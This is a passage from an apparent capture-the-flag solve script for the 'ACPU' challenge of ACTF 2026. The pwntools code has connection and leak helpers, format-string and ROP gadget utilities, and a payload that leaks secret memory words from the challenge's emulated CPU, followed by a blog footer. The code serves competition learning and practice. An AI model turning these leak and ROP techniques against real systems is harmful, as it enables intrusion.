# 'error' is applied after 'debug', so it wins when both are active.
if error:
    context(log_level='error')

# Breakpoints for gdb mode: ints become `breakrva`, strings become `b`.
# The tuple forms shown below are not handled by the loop that follows.
bps = [
# 0x1234,
# 'main',
# (0xe3b31, 'libc'), 
# ('system', 'libc')
]

# Build the gdb script only for a local gdb session.
gdb_cmd = ''
if gdb_ and switch == 0:
    gdb_cmd += "set breakpoint pending on\n"
    for b in bps:
       if isinstance(b, int):
           gdb_cmd += f"breakrva {hex(b)}\n"
       elif isinstance(b, str):
           gdb_cmd += f"b {b}\n"
    gdb_cmd += "c\n"

# Open the tube: remote socket, local binary under gdb, or the local run.py
# wrapper (default).
if switch:
   parts = target.replace(':', ' ').split()
   host = parts[-2]
   port   = int(parts[-1])
   use_ssl = '--ssl' in parts
   p = remote(host, port, ssl=use_ssl, sni=host if use_ssl else None)
elif gdb_:
   p = gdb.debug(file_name, gdbscript=gdb_cmd, aslr=True)
else:
   # Hard-coded local paths of the challenge attachment.
   path = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin/run.py"
   workspace = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin"
   p = process(["python3", path],cwd=workspace)

# --- Short aliases for methods of the global tube `p` ---
def s(data):             return p.send(data)
def sa(delim, data):     return p.sendafter(delim, data)
def sl(data):            return p.sendline(data)
def sla(delim, data):    return p.sendlineafter(delim, data)
def r(numb=4096):        return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
# The parameter name shadows the builtin `bool` inside this function only.
def rl(bool):            return p.recvline(keepends=bool)
def ra(t=None):          return p.recvall(timeout=t)
def rn(numb):            return p.recvn(numb)
def cl():                return p.close()
def it():                return p.interactive()
# --- Unpacking short leaks: pad to 8 bytes on the left (uc64) or right (uu64) ---
def uc64(data):          return u64(data.rjust(8, b'\x00'))
def uu64(data):          return u64(data.ljust(8, b'\x00'))
# Logs and returns elf.address + off; relies on lg() returning a falsy value.
def addr(off):           return lg(hex(off), (ret := elf.address + off)) or ret
# Coerce to bytes: bytes pass through, anything else goes through str().encode().
def cb(data):            return data if isinstance(data, bytes) else str(data).encode()
# log.success with formatting: ints as hex, bytes decoded, everything else via str().
def lg(name, data):      return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
# Send a menu choice after the prompt `pmt`.
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
# 3-byte big-endian encoding of an integer.
def bl(address):         return (address).to_bytes(3, 'big')
# Build a bytes object from the low 8 bits of each value.
def bt(*values):         return bytes([v & 0xff for v in values])
# Set elf.address from a leak and log it; `offset` is a symbol name or a number.
def ntpie(leak, offset, name='PIE'):  return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
# The default `binary` is bound to the `elf` object that exists when this line runs.
def base(val, binary=elf):            return binary.address + val  
# Repeat `content` (str or bytes) `num` times as bytes.
def fill(num, content=b'A'):          return (content.encode() if isinstance(content, str) else content) * num
# Find the first occurrence of `s` in the ELF, log it and return its address.
# The walrus target `addr` is local here and does not rebind the helper above.
def se(s): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next(elf.search(s if isinstance(s, bytes) else s.encode())))) or addr
# Each returns [padding count needed, new printed total] modulo 0x10000 (shn) or 0x100 (shhn).
def shn(target, current_printed):     return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed):    return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]

# ROP objects are cached per binary so gadget discovery runs only once.
_rop_cache = {}
def gg(s):
    """Return the address of the gadget described by `s`.

    `s` is a ';'-separated instruction list such as "pop rdi; ret". The
    gadget is looked up in the global `elf`; its address is logged and
    returned.

    Raises:
        ValueError: if no matching gadget is found.
    """
    binary = elf
    if binary in _rop_cache:
        rop = _rop_cache[binary]
    else:
        rop = _rop_cache[binary] = ROP(binary)

    wanted = [part.strip() for part in s.split(';')]
    gadget = rop.find_gadget(wanted)
    if not gadget:
        raise ValueError(f"[-] Critical: Gadget not found: {s}")

    lg(s, gadget.address)
    return gadget.address

def ga(delim=b'|', name='Leak', data=None):
    """Collect every 0x-prefixed hex number from some received data.

    The data source depends on `data`: an int means "receive that many
    bytes from the tube", any other truthy value is used as the data itself,
    and otherwise the tube is read up to `delim`. Each number found is
    logged as `name[i]`; the list of parsed integers is returned.
    """
    if isinstance(data, int):
        blob = p.recv(data)
    elif data:
        blob = data
    else:
        blob = ru(delim)

    if isinstance(blob, str):
        blob = blob.encode()

    leaks = []
    for i, token in enumerate(re.findall(b'0x[0-9a-fA-F]+', blob)):
        value = int(token, 16)
        leaks.append(lg(f'{name}[{i}]', value) or value)
    return leaks
#################################################################################

# Build the ROM payload: x5 holds the secret base address, then for each of
# the 16 secret words a load / store / load triple moves the word through
# public address 0 into its own register x10..x25.
words = []
words.extend(li32(5, 0x80000000))

for i in range(16):
    words.extend((
        lw(7, i * 4, 5),      # load secret word i into x7
        sw(7, 0, 0),          # store x7 to public address 0
        lw(10 + i, 0, 0),     # read it back into x(10 + i)
    ))

# Jump to 0x2000 to end the run.
words.extend(li32(6, 0x2000))
words.append(jalr(0, 0, 6))

payload = pack_words(words)
sla(b"give me your code:\n", base64.b64encode(payload))
out = ru(b"give me your code:\n").decode(errors="ignore")

# Parse the register dump ("xN = 0x????????") and rebuild the leaked bytes
# from x10..x25, little-endian.
regs = {
    int(m.group(1)): int(m.group(2), 16)
    for m in re.finditer(r"x(\d+)\s*=\s*0x([0-9a-fA-F]{8})", out)
}
leak = b"".join(regs[reg].to_bytes(4, "little") for reg in range(10, 26))
print(leak)
it()


题目链接:CTF-Writeups/ACTF 2026/ACPU at main · Zenquiem/CTF-Writeups


ACPU
https://zenquietus.top/archives/wei-ming-ming-wen-zhang-FHedRCvO
作者
ZenDuk
发布于
2026年05月17日
许可协议